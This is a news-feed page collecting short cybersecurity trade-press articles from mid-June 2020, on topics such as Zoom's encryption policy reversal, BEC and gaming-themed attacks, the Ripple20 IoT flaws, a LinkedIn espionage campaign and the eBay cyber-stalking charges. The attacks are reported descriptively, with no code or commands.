Info Security

Subscribe to Info Security  feed
Updated: 1 hour 6 min ago

Zoom Will Offer End-to-End Encryption for All Users

Thu, 06/18/2020 - 08:24
Zoom Will Offer End-to-End Encryption for All Users

Zoom has reversed its controversial decision to restrict access to end-to-end encryption (E2EE) for some users and will now offer the feature to customers of both its free and premium services.

The video conferencing app said it had consulted with rights groups, child safety advocates, government representatives, encryption experts and its own CISO council to gather feedback.

“We are also pleased to share that we have identified a path forward that balances the legitimate right of all users to privacy and the safety of users on our platform,” the firm's CEO Eric Yuan said in a blog post yesterday.

“This will enable us to offer E2EE as an advanced add-on feature for all of our users around the globe – free and paid – while maintaining the ability to prevent and fight abuse on our platform.”

Users of the free service will be required to authenticate in a one-off process with information such as their phone number, in order for the platform to “reduce the mass creation of abusive accounts,” Yuan added.

The news came as rights groups, tech firms and internet users petitioned the firm to reverse its policy on E2EE.

They argued that E2EE is too important to be a premium feature, especially in the context of global protests against racial injustice and government oppression. The technology protects activists, journalists and other vulnerable parts of the population from government repression and surveillance, as well as from cyber-criminals, they said.

The campaigners also argued that want to disguise any malicious intent or illegal activity can simply pay for the premium service.

Yuan was reported saying on an analyst call earlier this month that the firm would not be offering free users E2EE “because we also want to work together with FBI, with local law enforcement in case some people use Zoom for a bad purpose.”

Mozilla welcomed the news. The tech non-profit, which wrote an open letter to Zoom earlier in the week signed by tens of thousands of internet users, argued that E2EE should always be the default setting, not a luxury.

“We're heartened that Zoom listened to consumers, especially at a time when millions of people are relying on the platform to stay connected amid the pandemic and to organize in support of Black lives,” it said in a statement.

“Zoom’s decision is part of an emerging trend: Consumers are demanding more of the technology products and services they use every day. And companies are changing their products to meet these demands.”

Categories: Cyber Risk News

BEC Attackers Ditch C-Suite in Favor of Fresh Target

Wed, 06/17/2020 - 18:11
BEC Attackers Ditch C-Suite in Favor of Fresh Target

The number of Business Email Compromise (BEC) attacks being leveled at C-Suite executives has declined as threat actors focus on a new target.

According to new research published today by Abnormal Security, BEC attacks on C-Suite executives decreased by 37% in the first quarter of 2020 compared to the final quarter of 2019. 

Researchers discovered that cyber-criminals had a new springtime victim in their sights, as BEC attacks on finance employees—who hold the key to routine payments—shot up by more than 87%. 

The Abnormal Security Quarterly BEC Report for Q1 2020 notes a shift away from individual attacks to group BEC attacks. Campaigns with more than 10 recipients increased by 27% quarter by quarter. 

Researchers found that criminals had switched their focus away from paycheck and engagement fraud and toward payment fraud. Invoice fraud attacks were found to have increased more than 75%.

A section of the report was devoted to trends around email account compromise and security attack patterns observed during the COVID-19 pandemic. 

Evan Reiser, CEO and co-founder of Abnormal Security, described the attacks related to the outbreak of the novel coronavirus as "among the most sinister in intent that we have ever seen."

Researchers found that COVID-related attacks more than quadrupled between the second and third weeks of March 2020. Cyber-assaults increased 436%, with an average 173% week-over-week increase during the quarter.

COVID-19 vectors exploited by criminals included vaccines, PPE equipment, stimulus checks, PPP payments, layoff concerns, and the popularity of video conferencing tools. 

The majority of the coronavirus attacks Abnormal caught were scams that leveraged trusted entities, using compromised and spoofed accounts in order to scam users and companies out of money, steal their credentials, or install malware on their device.

“The email security trends we witnessed during Q1 are most certainly related to the COVID-19 pandemic and the shift to work from home, but they also reflect greater sophistication and attack strategy by threat actors,” said Reiser. 

“By increasing campaign target size, attackers increase the opportunity for social validity and by targeting finance employees who manage third-party payments, they’ve found a new vector for payouts.”

Categories: Cyber Risk News

Sharp Rise in Web Attacks on Gamers

Wed, 06/17/2020 - 17:33
Sharp Rise in Web Attacks on Gamers

Cyber-criminals stepped up their efforts to victimize gamers while millions of people stayed at home this spring to slow the spread of COVID-19.

New research published today by Kaspersky found that in April, the daily number of blocked attempts to direct users to malicious gaming-themed sites increased by 54%, compared to January 2020.

In the same month, the number of blocked attempts to force gamers onto phishing pages for one of the most popular gaming platforms also increased by a whopping 40% compared to February 2020. 

Kaspersky researchers took a special interest in threats to gamers after lockdown measures saw millions turn to video games as a source of entertainment. Beginning in March, online gaming platform SteamDB saw a record number of users, with 20.3 million people in-game simultaneously over one weekend. 

According to data from Kaspersky Security Network, cyber-criminals have exploited the increased interest in video games to launch various attacks. 

Minecraft, one of the most popular games ever made, was the title most often used by threat actors. Its name featured in more than 130,000 web attacks. The other games used most frequently to launch attacks were Counter-Strike: Global Offensive and The Witcher 3.

Maria Namestnikova, security expert at Kaspersky, said threat actors used the promise of cheats to lure gamers into clicking malicious links. 

“The past few months have shown that users are highly susceptible to falling for phishing attacks or clicking on malicious links when it comes to games—whether they’re looking to find pirated versions or eager for a cheat that will help them win,” said Namestnikova.

Yury Namestnikov, also a security expert at Kaspersky, said that gamers working from home who play and toil on the same device should be particularly wary of cyber-threats.

“Now that many players started using the same machines that they use to enter corporate networks for games, their cautiousness should be doubled: risky actions make not only personal data or money vulnerable but also corporate resources,” said Namestnikov.

Kaspersky researchers urged gamers to protect themselves by using strong passwords and two-factor authentication where possible and to be wary of any cheats and pirated copies of video games.

Categories: Cyber Risk News

Illinois Tech CEO Charged with #COVID-Relief Fraud

Wed, 06/17/2020 - 16:47
Illinois Tech CEO Charged with #COVID-Relief Fraud

The founder and CEO of two Illinois software companies has been charged with fraudulently claiming over $400,000 from the Paycheck Protection Program (PPP).

Evanston resident Rahul Shah allegedly lied on an application for a forgivable bank loan guaranteed by the Small Business Administration (SBA) under the Coronavirus Aid, Relief, and Economic Security (CARES) Act.

The 51-year-old was charged in a federal criminal complaint filed in the Northern District of Illinois with bank fraud and making false statements to a financial institution.  

Shah is the founder and CEO of tech companies Boardshare LLC and Katalyst Technologies, Inc. Both companies are based on Davis Street in downtown Evanston. 

Katalyst, which was founded in 2000, also has offices in Atlanta, London, and in several cities in India. 

Shah applied for a PPP loan from the bank of Texas on April 15 for Katalyst. On April 30, he applied for a second loan on behalf of N2N Holdings LLC, which operates under the name Boardshare. 

According to the Department of Justice (DOJ), Shah "significantly overstated the payroll expenses of a company that he controlled" and submitted falsified IRS documents to the lender. 

On an IRS 1099-MISC form, Shah claimed that one of his companies had made payments to several individuals. These claims turned out to be false upon investigation.

In addition, Shah misrepresented his company's payroll expenses for 2019 in documents that he signed and caused to be submitted to the lender.

"A comparison between the documents submitted to the lender and the company’s IRS filings revealed that Shah’s company reported significantly lower payroll expenses to the IRS," said a spokesperson for the DOJ. 

An affidavit from James Sams, an agent with the Treasury Inspector General for Tax Administration, said Shah paid Boardshare's employees less than $10k over a period in which he claimed to have spent $426k on payroll. 

In an interview with FBI and Treasury agents on May 29, Sams alleges that Shah acknowledged that there were "errors" in his application and blamed them on employees in India. 

If convicted of both counts, Shah could face a sentence ranging from probation to up to 60 years in federal prison.

Categories: Cyber Risk News

Widespread Security Vulnerabilities in Mobile Banking Apps

Wed, 06/17/2020 - 14:31
Widespread Security Vulnerabilities in Mobile Banking Apps

Half of mobile banks are vulnerable to fraud and theft of funds due to inadequate security on apps, according to a study by Positive Technologies. The analysis found that mobile banking applications have a raft of security flaws which can be exploited by cyber-criminals to access sensitive data and commit fraud.

Positive Technologies said that none of the 14 mobile banking applications tested had an acceptable level of security. In regard to the applications installed by clients, 43% were shown to store important information on the phone in clear text, making the data at risk of being accessed by an unauthorized party. In addition, 76% of the vulnerabilities can be exploited without physical access to the device and over one-third can be exploited without administrator rights.

Each mobile bank analyzed had an average of 23 vulnerabilities on the server side, which contained 54% of all the vulnerabilities found. Close to half (43%) had server-side vulnerabilities in business logic, which attackers can use to access sensitive user information and commit fraud. The report also stated that hackers can steal user credentials in five out of seven mobile banks while card information is at risk in one-third.

There were also variations in the types of security flaws between iOS and android apps; in iOS, no flaws were rated above ‘medium,’ whereas in android, 29% were ‘high risk.’

Olga Zinenko, analyst at Positive Technologies, commented: “Banks are not protected from reverse engineering of their mobile apps. Moreover, they give short shrift to source code protection, store sensitive data on mobile devices in clear text and make errors allowing hackers to bypass authentication and authorization mechanisms and bruteforce user credentials. Through these vulnerabilities, hackers can obtain usernames, account balances, transfer confirmations, card limits and the phone number associated with a victim’s card.

“We urge that banks do a better job of emphasizing application security throughout both design and development. Source code is rife with issues, making it vital to revisit development approaches by implementing SSDL practices and ensuring security at all stages of the application lifecycle.”

Just last week, the FBI warned that cyber-criminals are seeking to take advantage of the growing use of mobile banking apps during COVID-19.

Categories: Cyber Risk News

Petitions Demand Zoom Changes End-to-End Encryption Stance

Wed, 06/17/2020 - 11:20
Petitions Demand Zoom Changes End-to-End Encryption Stance

Technology companies and rights groups are calling on Zoom to reverse its stance on end-to-end encryption, which currently denies users of its free service the strongest possible security and privacy protections.

The video conferencing app controversially announced earlier this month that only users of its premium service would have their conversations protected by end-to-end encryption.

“Free users for sure we don’t want to give [end-to-end encryption] because we also want to work together with FBI, with local law enforcement in case some people use Zoom for a bad purpose,” CEO Eric Yuan reportedly said.

Now a coalition of non-profits, tech groups and tens of thousands of internet users have called on the firm to change its mind.

An open letter to Yuan from the EFF and Mozilla, signed by over 19,000 internet users, argued that offering the strongest possible security to all users is more important now than ever, at a time when political activists and protesters may be the target of government surveillance.

“Best-in-class security should not be something that only the wealthy or businesses can afford. Zoom’s plan … will leave exactly those populations that would benefit most from these technologies unprotected,” it noted.

“Around the world, end-to-end encryption is already an important tool for journalists and activists that are living under repressive regimes and fighting censorship. We recognize that Zoom's business model includes offering premium features for paid accounts, but end-to-end encryption is simply too important to be one of those premium features.”

A separate petition sent to the firm by Fight for the Future, Daily Kos, MPower Change, Mijente, Kairos, Media Alliance and Jewish for Peace has garnered over 50,000 signatures.

It claimed that Yuan’s defense of the decision, that the firm wanted to help law enforcement, was absurd.

“People with bad intentions can just pay for the account to ensure their calls are secure,” it argued. “Meanwhile, people who can’t afford Zoom’s services are left vulnerable to cyber-criminals, stalkers and hackers.”

Zoom’s recent admission that it suspended the accounts of Chinese human rights activists after a request from Beijing will only add further weight to the calls.

Categories: Cyber Risk News

Avast Appoints Nick Viney to Lead Telco, IoT and Family Security Business Unit

Wed, 06/17/2020 - 10:30
Avast Appoints Nick Viney to Lead Telco, IoT and Family Security Business Unit

Global digital Security and privacy product provider Avast has announced the appointment of Nick Viney as senior vice-president and general manager for its Telco, Internet of Things (IoT) and Family security business unit.

Viney joins Avast from Cyber 1 – a publicly listed enterprise cybersecurity provider – where he was Group CEO. He has previously held roles at McAfee, Google and Microsoft.

In his new role, he will oversee Avast’s global strategy and lead the development of the company’s position in smart home security while expanding its overall portfolio of security products and partners including telecommunications providers and original equipment manufacturers.

“Avast is a company I have long admired for its commitment to innovation, focus on the customer and for its mission to make the world a safer place for everyone, particularly the most vulnerable in our society,” said Viney.

“These are values I have stood by throughout my entire career and I’m looking forward to leading some important projects for the company that are tackling real-world cybersecurity problems and issues for consumers today.”

Categories: Cyber Risk News

Aerospace Executives Targeted Via LinkedIn Recruitment Messages

Wed, 06/17/2020 - 10:00
Aerospace Executives Targeted Via LinkedIn Recruitment Messages

Attackers leveraged LinkedIn and posed as recruiters in order to steal information and money from European military and aerospace executives.

According to new research from ESET, the technique involved threat actors contacting the executives via LinkedIn posing as recruiters. Named Operation In(ter)ception, the actions took place from September to December 2019 and began with what ESET called “a quite believable job offer, seemingly from a well-known company in a relevant sector” and contained a OneDrive link which contained a PDF document with salary information related to the fake job offer.

However, ESET malware researcher Dominik Breitenbacher said malware was silently deployed on the victim’s computer giving the attacker “an initial foothold and reached a solid persistence on the system.”

Among the tools the attackers utilized was custom multistage malware that often came disguised as legitimate software, and modified versions of open-source tools.

Speaking on ESET’s Virtual World conference this week, head of threat research, Jean-Ian Boutin, said the job offer was often “too good to be true” and while the conversation would start out as friendly, the attacker would pressure the executive to answer questions more and more rapidly. The attacker would also ask what system the executive was using in order to determine configurations.

Boutin said the PDF file was a decoy, which featured positions with expected salaries. However, the executable creates a scheduled task on the victim’s computer, a built-in functionality in Windows, which is automatically launched. “This can be very useful in an enterprise set up, but is also a common technique used by threat groups to ensure their malicious payload is run periodically once it is installed,” he said.

He explained that the malicious payload in the scheduled task is used by the attacker to connect to an external server “and is able to download and execute arbitrary content.”

Post-attack, Boutin said all of the exfiltrated data was placed in password-protected RAR archives, and uploaded to Dropbox using a command line tool. “What made this threat actor difficult to track was that their operators were really careful and cleaned up their traces when moving from one system to another,” he said. The attackers also removed the LinkedIn profiles once the compromise was successful.

During the research, ESET also determined some similarities with actions by the Lazarus group, who had been attributed as being involved with the Sony Pictures attack and the WannaCry outbreak. Whilst ESET said there was not enough information to definitely attribute these attacks to the Lazarus Group, there were some similarities in the code and tactics used.

In a comment sent to Infosecurity, Paul Rockwell, head of trust and safety at LinkedIn, said: “We actively seek out signs of state-sponsored activity on the platform and quickly take action against bad actors in order to protect our members. We don’t wait on requests, our threat intelligence team removes fake accounts using information we uncover and intelligence from a variety of sources, including government agencies.

“Our teams utilize a variety of automated technologies, combined with a trained team of reviewers and member reporting, to keep our members safe from all types of bad actors. We enforce our policies, which are very clear: the creation of a fake account or fraudulent activity with an intent to mislead or lie to our members is a violation of our terms of service.

“In this case, we uncovered instances of abuse that involved the creation of fake accounts. We took immediate action at that time and permanently restricted the accounts.”  -

Categories: Cyber Risk News

#COVID19 Forces Positive Long-Term Changes to Cybersecurity

Wed, 06/17/2020 - 09:30
#COVID19 Forces Positive Long-Term Changes to Cybersecurity

COVID-19 lockdowns around the world have led to an increase in some of the most common attack types, but also a realization that businesses must change going forward, according to over 80% of IT professionals polled by Bitdefender.

The security vendor interviewed 6724 security and IT staff in May across the UK, US, Australia/New Zealand, Germany, France, Italy, Spain, Denmark and Sweden, covering all sizes of organization.

Some 86% claimed attacks had increased during lockdown, especially phishing (26%), ransomware (22%), social media threats/chatbots (21%), cyber-warfare (20%), Trojans (20%) and supply chain attacks (19%). In some cases, such as ransomware (31%) and DDoS (36%) the increase in volume of attacks was in the double-digits.

Around a third (34%) of respondents warned that home working employees were too relaxed about security, leading to concerns over phishing (33%) and accidental data leaks (31%). A third claimed home workers aren’t following protocol by identifying and flagging suspicious activity.

Other risks from remote working highlighted by respondents include third parties using corporate laptops and devices (38%) and the use of personal messaging services for work (37%).

Unsurprisingly, half (50%) said they had no contingency plan in place for a scenario such as COVID-19.

However, on the positive side, global organizations are taking proactive steps to improve cybersecurity readiness and resilience going forward.

Over a fifth (22%) said they’ve started providing VPN and made changes to VPN session lengths, 20% have shared cybersecurity guides and deployed pre-approved applications and content filtering, and 19% have updated employee training.

Almost a third (31%) said they intend to keep 24/7 IT support once the pandemic recedes and will increase security training. Even better, 23% said they’re going to increase cooperation with key business stakeholders when drawing up cybersecurity policies, and a similar number will increase outsourcing of IT security functions.

Liviu Arsene, global cybersecurity researcher at Bitdefender, argued that customer loyalty, trust and the bottom line are at risk if organizations don’t get cybersecurity right during the pandemic, and beyond.

“COVID-19 has however presented infosec professionals with the opportunity to reassess their infrastructure and refocus on what end users/employees really need and want in terms of cybersecurity support,” he added.

“It is also evident that, despite identifying risks, there is still a need for further investigation into what investments need to be made to ensure that corporate data and employees are both safe from bad actors. While it’s a challenge to make changes now, it will shore up business for the future and many more unknown scenarios.”

Categories: Cyber Risk News

CIA Report Slammed Agency’s Security as “Woefully Lax”

Wed, 06/17/2020 - 08:40
CIA Report Slammed Agency’s Security as “Woefully Lax”

A US senator is demanding to know why the CIA is still not following the government’s advice on best practices after he obtained a 2017 report describing the agency’s day-to-day cybersecurity as “woefully lax.”

The internal report was written by the CIA’s WikiLeaks Task Force in the wake of the Vault 7 disclosures to the whistleblowing site, which amounted to the “largest data loss” in its history.

At least 180GB and potentially as much as 32TB of information, including data on a range of cyber-weapons, was stolen by an insider in 2016. The CIA said it didn’t know how much data was taken because there were no safeguards such as user monitoring on the Center for Cyber Intelligence software development network (CCI DevLAN), where much of it was stored.

Democrat senator Ron Wyden on Tuesday wrote to the director of national intelligence, John Ratcliffe, warning that the agency was still lagging behind on implementing even basic cybersecurity used widely elsewhere in federal government.

This includes DMARC to help prevent phishing and email impersonation, and multi-factor authentication for the CIA’s .gov domains and the Joint Worldwide Intel Communications System (JWICS), which is used for top secret comms in the US intelligence community.

According to the report, the CCI had for many years “prioritized building cyber-weapons at the expense of securing their own systems.

“Most of our sensitive cyber-weapons were not compartmented, users shared systems administrator-level passwords, there were no effective removable media controls and historical data was available to users indefinitely,” it continued.

“CCI focused on building cyber-weapons and neglected to also prepare mitigation packages if those tools were exposed. These shortcomings were emblematic of a culture that evolved over the years that too often prioritized creativity and collaboration at the expense of security.”

The irony, said Wyden, is that the intelligence community was not formally required to implement specific security policies mandated to other federal agencies by the Department of Homeland Security (DHS), as it was assumed that it would go “above and beyond.”

Fausto Oliveira, principal security architect at Acceptto, argued that the Department of National Intelligence budget runs into the tens of billions, which should allow the CIA to address the concerns raised by Wyden.

“Based on the findings of the report, it appears that there was a lack of IT and cybersecurity governance that led to a lax adoption of security controls,” he added.

“It is not an operational matter, it is a matter of the agency's management not setting the right goals to manage the risks associated with operating an organization, specifically an organization that is a desirable target for all kinds of attackers.”

Categories: Cyber Risk News

Ripple20 Vulnerabilities Affect Hundreds of Millions of IoT Devices

Tue, 06/16/2020 - 17:06
Ripple20 Vulnerabilities Affect Hundreds of Millions of IoT Devices

Zero-day vulnerabilities have been discovered that could impact millions of IoT devices found in data centers, power grids, and elsewhere.

The flaws, dubbed Ripple20, were detected by the JSOF research lab in a widely used low-level TCP/IP software library developed by Treck, Inc. In research published today, JSOF said Ripple20 includes multiple remote code execution vulnerabilities and affects "hundreds of millions of devices (or more)."

Researchers named the vulnerabilities Ripple20 to reflect the widespread impact they have had as a natural consequence of the supply chain "ripple-effect" that has seen the widespread dissemination of the software library and its internal flaws.

"A single vulnerable component, though it may be relatively small in and of itself, can ripple outward to impact a wide range of industries, applications, companies, and people," wrote researchers.

Ripple20 reached critical IoT devices involving a diverse group of vendors from a wide range of industries. Affected vendors range from one-person boutique shops to Fortune 500 multinational corporations, including HP, Schneider Electric, Intel, Rockwell Automation, Caterpillar, and Baxter.

Researchers said many other major international vendors are suspected of being vulnerable in the medical, transportation, industrial control, enterprise, energy (oil/gas), telecom, retail and commerce, and other industries. 

"The risks inherent in this situation are high," wrote researchers. "Data could be stolen off of a printer, an infusion pump behavior changed, or industrial control devices could be made to malfunction." 

By exploiting the flaws, an attacker could hide malicious code within embedded devices for years. One potential risk scenario is that a threat actor could broadcast an attack capable of taking over all impacted devices in the network simultaneously. 

"This is a classic case of finding critical vulnerabilities in embedded IoT devices that were designed years ago and may now be impossible or impractical to patch," commented Phil Neray, VP of IoT & industrial cybersecurity at CyberX.

"The best strategy is to implement compensating controls such as network segmentation to make it harder for adversaries to connect to these devices, plus Network Traffic Analysis (NTA) with Security Orchestration, Automation, and Response (SOAR) to quickly spot anomalous behavior—and stop it—before they cause a safety incident, shut down production, or steal intellectual property."

Categories: Cyber Risk News

Wiggle Investigates Cyber-Attack

Tue, 06/16/2020 - 16:24
Wiggle Investigates Cyber-Attack

Online sports retailer Wiggle is investigating a suspected cyber-attack after receiving a series of complaints from customers.

Concerns were raised after customers received emails confirming orders for items from Wiggle that they had not placed. The suspicious orders were set to be delivered to addresses that the confused customers did not recognize. 

The idea that Wiggle had been hit by a possible cyber-attack was first mooted on June 12. One customer reached out to cycling news site after failing to illicit a response from Wiggle regarding a £30 order charged to his account that he said was not made by him.

Another Wiggle customer, Kobi Omenaka, took to Twitter to complain that he had received no response from the retailer after informing them that an imposter had used his account to purchase a £237.50 skin-tight cycling suit in dark steel blue. 

Along with an attachment of the order confirmation, Omenaka posted "@Wiggle_Sport someone broke into my account and ordered this. I told customer services as it happened but no one has come back to me."

Twitter user George Slokoski responded to Omenaka's tweet, saying that he had also experienced issues with his Wiggle account.

"Mine also hacked this AM," wrote Slokoski. "Got an email saying my email address has changed to and shortly after I had a charge for £5."

Another user, Harry Holmes, tweeted, "The same happened to me!" and asked Omenaka if his fake order was also being sent to an address in Twickenham, London.

On June 14, another customer, who uses the handle @hayleybadger on Twitter, tweeted the store: "@Wiggle_Sport Are you under cyber attack? I've received an email to say someone's changed my account to their email address and I can’t access your website."

Wiggle responded to the tweet above with an invitation to discuss the matter over live chat. 

Twitter user @Omidpyc claims Wiggle has been aware of a cybersecurity breach for over ten days but has not gone public with the news.

Earlier today he tweeted: "Just had a call from Ross Clemmons. He says Wiggle are going to put out an announcement (Crossed fingers) and apologized for their dire response over the weekend."

According to @Omidpyc, Clemmons "agreed customer account flow was insecure and it’s been reported to ICO."

Categories: Cyber Risk News

eBay Executives Charged With Cyber-Stalking Critics

Tue, 06/16/2020 - 15:47
eBay Executives Charged With Cyber-Stalking Critics

Six senior eBay employees have been charged with intimidating and cyber-stalking the couple behind an online newsletter whose media coverage they didn't like.

The executives, who no longer work for the online marketplace, allegedly sent a stream of terrifying deliveries to the homes of the newsletter's editor and publisher and their neighbor. Sinister deliveries received by the couple over a period of weeks included a bloody pig mask, a wreath of funeral flowers, and live spiders and cockroaches. 

Pornographic magazines with the husband's name on them were sent to the house of one of the couple's neighbors in Natick, Massachusetts. In addition, officials said that a plot had been hatched by the executives to break into the garage of the alleged victims and fit a GPS tracking device to their vehicle. 

The former executives allegedly launched their prolonged campaign of terror after a newsletter run by the couple published a piece concerning some litigation in which eBay was embroiled. 

It is further alleged that the executives created fake social media accounts that they used to send the couple a series of threatening messages and post about phony events happening at the couple's home address. 

“This was a determined, systematic effort by senior employees of a major company to destroy the lives of a couple in Natick all because they published content that company executives didn’t like," said Massachusetts US attorney Andrew Lelling.

"For a while they succeeded, psychologically devastating these victims for weeks as they desperately tried to figure out what was going on and stop it."

Court documents reveal that one member of eBay's executive team directed the company's former senior director of safety and security, James Baugh, to "take her down," referring to the newsletter's editor. 

San Jose, California, resident Baugh, along with eBay’s former director of global resiliency, David Harville, of New York City, are charged with conspiracy to tamper with witnesses and conspiracy to commit cyber-stalking. 

Other former eBay employees charged in relation to the alleged cyber-stalking are Stephanie Popp, former senior manager of global intelligence; Stephanie Stockwell, former manager of eBay’s Global Intelligence Center; Brian Gilbert, former senior manager of special operations for eBay’s Global Security Team; and Veronica Zea, a former eBay contractor who worked as an intelligence analyst in the Global Intelligence Center.

Categories: Cyber Risk News

ESET CTO: AI Can Work With Correct Human Intervention

Tue, 06/16/2020 - 15:06
ESET CTO: AI Can Work With Correct Human Intervention

AI and machine learning technologies need training and human intervention to work as expected.

Speaking as part of ESET’s Virtual World event, CTO Juraj Malcho said there are perceptions that AI is evil or mysterious, but “it is not magic, not self-aware and it is invented and programmed by humans; it doesn’t have any obscure intentions” and it relies on inputs.

“There are some companies out there that claim they have magic solutions, but that is not the case,” he said. “I like to say it is advanced computer assisted automation.” He admitted whilst that made it sound uninteresting, “it is a beautiful thing if you look under the hood,” as we didn’t have computers and technology to utilize machine learning capabilities for many decades, but we have other ways to apply them now.

Citing an how automation can be used in malware detection, Malcho said unique clusters of malware samples are often classified by common traits. In one example, he referred to a case where 7.7 million Emotet attacks had been detected by ESET, and as the company was able to classify using machine learning of a single DNA detection, three million attacks were discovered “thanks to us seeing common traits of a family.”

Malcho admitted that machine learning is not accurate but it is a fast way to detect, and “accuracy is best when you have a human involved and work hand in hand.” However, machine learning also comes with challenges, he added, such as when you feed it with data “you may find you don’t have the capacity of your computing systems to process all of the data.”

This requires a hybrid approach, where you pre-select the samples and train your models. “The trick here is to have it balanced, as if the model is imbalanced and not representing the real world properly, you are basically getting junk in and the result is junk out,” he said.

Consideration also has to be made regarding the malicious use of automation too, he continued, and malicious usage can include generating and distributing spam and phishing, and Malcho said automation is also commonly used in language translation.

He also claimed that attackers can detect intruders in their infrastructure, identify patterns in generated content, create false flags and choose the best target and attack methods.

Concluding, Malcho said that AI “is far from 'Skynet' and trying to control us, it is just a tool that we have at our disposal” and it depends on how well you are able to use it.

He said: “AI without data is just beautiful math, and data without AI is basically just a bunch of ones and zeros. One doesn’t exist without the other. So when the perfect combination of these elements is achieved and properly validated data is fed into the properly-designed systems, a euphoric moment is created.”

Categories: Cyber Risk News

46% of SMEs Sharing Confidential Files by Email During Lockdown

Tue, 06/16/2020 - 14:16
46% of SMEs Sharing Confidential Files by Email During Lockdown

Nearly half (46%) of small and medium-sized enterprises (SMEs) regularly share confidential files via email, including financial and employee data in spreadsheets, according to a new study from the Lanop Accountancy Group. This is despite the fact that 60% have not upgraded their organizations’ cybersecurity capabilities since shifting to remote working during COVID-19.

In a survey of 100 company owners of SMEs based in London, UK, which focused on their security habits during the pandemic, 59% revealed they had received an increase in phishing emails since lockdown began.  

Cybersecurity expert Tim Sadler, CEO of Tessian, said: “Protecting people on email has to be a priority in this new hybrid world where employees can work from anywhere. All it takes is one simple mistake or typo for sensitive and confidential files to land in the wrong inbox and for a company to suffer a significant data breach.”

SMEs also outlined IT difficulties they have faced as a result of moving to a remote working model. A quarter said they share a Zoom account with another company, and one in five have been forced to cancel a meeting due to conference systems crashing. Meanwhile, 30% reported purchasing additional laptops, mobiles and tablets to manage remote working.

In addition, one third of company owners don’t believe they have the IT systems to continue remote working for a further three months, while 28% said their staff lack the digital skills to work from home.

Lanop also found nearly half (45%) plan to increase their IT spending in the near future, while 23% will not renew their office lease beyond the crisis.

Sridhar Iyengar, managing director of Zoho Europe, added: “The COVID-19 crisis has forced the majority of business owners to quickly implement remote working systems in order to continue trading despite strict lockdown measures. For many companies, successfully managing urgent projects, team meetings and company finances online against the backdrop of economic turmoil has brought with it a myriad of delays.”

A survey published last month by Bitglass found that most organizations are not sufficiently prepared to securely support remote working, even though 84% intend to continue this practice beyond the crisis.

Categories: Cyber Risk News

New Fake Ad Alert System Launched to Fight Online Scams

Tue, 06/16/2020 - 12:15
New Fake Ad Alert System Launched to Fight Online Scams

A new system to detect and remove scam adverts from the internet has been launched in the UK.

As reported by ITV, the UK Scam Ad Alert tool – set up by the Advertising Standards Authority (ASA) and the Internet Advertising Bureau (IAB) with support from digital ad platforms and tech giants – will allow people to report scam ads which appear in paid-for spaces online.

The ASA will then circulate details of the ads, remove them and suspend the advertiser’s account where possible. The ASA said that the system has been launched in response to concerning growing trends around online fraud and the financial harm it can cause.

ASA chief executive Guy Parker said: “The overwhelming majority of ads responsibly inform and entertain their audience, but a small minority are published with criminal intent.

“Our Scam Ad Alert system will play an important part in helping detect and disrupt these types of scams. By working closely with our partners such as Google and Facebook we can act quickly to have problem ads taken down as part of our ongoing work to better protect consumers online.”

However, Jake Moore, cybersecurity specialist at ESET, pointed out that, whilst such alert systems can help fight online scams, user awareness also plays a big part in detecting and stopping scams from being successful.

“Users need all the help they can get in a space where scam adverts are rife. However, a scam alert system only works when people correctly identify a misleading advert and they are taken down quickly enough before others are unfortunate enough to click into them. Similar to reporting abuse on social media, the efficiency of such systems is all down to the speed in which they can be effective.

“This is at the very least a step in the right direction, but the best approach is to teach the users about awareness and how to spot a fraudulent advert. Such clues lie in poor stylistics, bad grammar and strange looking links when hovering over the advert or long clicking on it.”

Categories: Cyber Risk News

Global DDoS Attack Dismissed as T-Mobile Misconfiguration

Tue, 06/16/2020 - 10:35
Global DDoS Attack Dismissed as T-Mobile Misconfiguration

Claims of a global DDoS attack have been dismissed, with evidence showing it was caused by a misconfiguration.

The issue was apparently caused by a misconfiguration at T-Mobile in the USA. Mike Sievert, CEO of T-Mobile, claimed in a statement published at 845pm PT that it had “been experiencing a voice and text issue that has intermittently impacted customers in markets across the US” which started just after 12pm EDT, and continued through the day.

“This is an IP traffic-related issue that has created significant capacity issues in the network core throughout the day,” Sievert said. “Data services have been working throughout the day and customers have been using services like FaceTime, iMessage, Google Meet, Google Duo, Zoom, Skype and others to connect.

“I can assure you that we have hundreds of our engineers and vendor partner staff working to resolve this issue and our team will be working through the night as needed to get the network fully operational.”

T-Mobile claimed on Twitter that it was a “widespread routing issue affecting voice & text” and this affected customers around the country.

Despite regular updates and clarifications, claims that there was a global DDoS attack taking place were seen. Some claimed that brands including Sprint, AT&T, Verizon, Comcast, Fortnite, Instagram and Chase Bank were affected, while this map appeared to show a large flow of attack traffic coming from the US.

However, Cloudflare CEO Matthew Prince dismissed claims of a DDoS attack, saying in a Twitter thread that he saw the issue with T-Mobile “making some changes to their network configurations today” and “unfortunately, it went badly” as the result was six hours “of cascading failures for their users.”

Prince added: “This is no massive DDoS attack. First, traffic from WARP to supposedly impacted services is normal and has no increase in errors. Second, there is no spike in traffic to any of the major internet exchanges, which you do see during actual DDoS attacks and definitely would see during one allegedly this disruptive.”

Categories: Cyber Risk News

IT Pros Feel #COVID19 Pressure as 66% Cite Increased Security Risks

Tue, 06/16/2020 - 10:20
IT Pros Feel #COVID19 Pressure as 66% Cite Increased Security Risks

IT professionals have been placed under extreme pressure to support mass home working over the past few months, with two-thirds reporting an increase in security issues, according to Ivanti.

The endpoint security firm polled 1600 global IT professionals to better understand their changing workload during recent government-mandated lockdowns.

Of those who cited security challenges, malicious emails (58%), non-compliant employee behavior (45%) and an increase in software vulnerabilities (31%) came out top.

Yet the bigger picture is that IT teams have been stretched on an almost unprecedented scale due to the demands of a newly distributed workforce.

For 63% of those interviewed, IT workloads increased 37% since remote working began. The most common requests include VPN issues (74%), video conferencing (56%), bandwidth constraints (48%), password resets (47%) and messaging issues (47%).

Specifically, they have been forced to do things like increase VPN access to more employees (70%), source, set up and distribute extra devices (54%) and create more “how to” articles for staff (52%).

Against this backdrop, a lack of communication was cited as a top challenge by 20% of respondents.

This extra workload is somewhat understandable, given that respondents have seen a 93% increase on average in remote workers. More than a third of respondents said 100% of employees are now working from outside the office.

“Responding to the COVID-19 pandemic has indeed placed an unprecedented demand on IT teams as they work to balance security and user productivity for the new remote workforce,” said Phil Richards, chief security officer at Ivanti.

“It’s a shift we see first-hand at Ivanti. To ease the new IT workload, we found that by employing more IT service automation and asset management optimization our IT staff are better equipped to support users’ needs, while also taking necessary actions to mitigate security risk. As a result, we are able to ensure employees can remain both productive and safe.”

